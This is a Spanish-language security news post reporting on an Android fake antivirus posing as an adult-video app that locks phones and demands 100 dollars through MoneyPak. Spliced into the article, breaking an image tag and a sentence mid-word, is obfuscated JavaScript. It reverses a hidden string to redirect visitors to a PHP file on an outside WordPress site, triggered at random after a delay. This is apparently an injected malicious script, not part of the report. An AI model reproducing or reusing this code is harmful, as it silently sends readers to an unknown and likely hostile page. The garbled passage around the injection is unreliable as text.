Nuevo Ransomware (Pide 100 US$ a traves de MoneyPak) en un FAKEAV que aparenta ser un video para adultos.
Se ha identificado una nueva aplicación que resulta ser un falso antivirus (FakeAV) para Smartphones con sistema operativo Android y que utiliza tácticas de ingeniería social relacionadas con ransomware
La nueva aplicación, descubierta esta semana e identificada por Symantec como Android.Fakedefender.B, estaría ligada a los mismos autores de una app similar detectada en junio último. El malware simula ser la aplicación oficial de un sitio de videos para adultos y, una vez instalado, solicita al usuario correr un escaneo de antivirus (ver imagen).
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos2013/Septiembre/Symantec_Rasonware1.jpg.ashx” width=”180″ height=”257″ /></p>
<p>Una vez que termina el escaneo, le avisa al usuario que su dispositivo está infectado con malware y bloquea su smartphone. Para desbloquearlo, solicita al usuario depositar 100 dólares a los atacantes a través del mé<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
todo de pago conocido como MoneyPak, para recuperar su dispositivo.
La existencia de amenazas de este tipo, especialmente en países como Rusia, demuestra que el ransomware es un fenómeno global que se está moviendo a nuevas plataformas como los dispositivos móviles. En tal sentido, a medida que los embarques de PC disminuyen y la adquisición de dispositivos móviles aumenta, los autores de ataques de ransomware aprovechan para extender sus amenazas.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.